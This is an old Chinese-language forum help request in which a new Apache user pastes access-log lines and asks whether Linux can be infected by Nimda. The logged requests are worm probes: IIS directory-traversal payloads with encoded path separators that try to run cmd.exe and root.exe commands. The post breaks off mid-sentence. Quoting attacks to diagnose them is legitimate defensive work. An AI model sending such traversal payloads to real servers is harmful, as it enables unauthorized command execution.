由 7dehao 在 05-08-2003 08:33 发表:
linux会感染上nimda病毒吗?HELP!
刚装好apache,昨天看access_log就看到下面一段,今天看还有,而且IP都在变的,我不知道这是Linux服务器感染了nimda还是局域网中的windows2000被感染了(局域网中的windows都有杀毒软件),而且时间集中在中午和半夜,一直到早上4点多,
"GET /scripts/root.exe?/c+dir HTTP/1.0" 404 210 "-""-"
"GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 208 "-""-"
"GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 218 "-" "-"
"GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 218 "-" "-"
"GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232 "-" "-"
"GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dirHTTP/1.0" 404 249 "-" "-"
"GET/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 249 "-" "-"
"GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c..
/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 265 "-" "-"
"GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-" "-"
"GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-" "-"
"GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-" "-"
"GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-" "-"
"GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215 "-" "-"
"GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215 "-" "-"
"GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232 "-" "-"
"GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232 "-" "-"
"GET /scripts/root.exe?/c+dir HTTP/1.0" 404 210 "-" "-"
"GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 208 "-" "-"
"GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 218 "-" "-"
"GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 218 "-" "-"
"GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232 "-" "-"
"GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 249 "-" "-"
"GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 249 "-" "-"
同时还有一段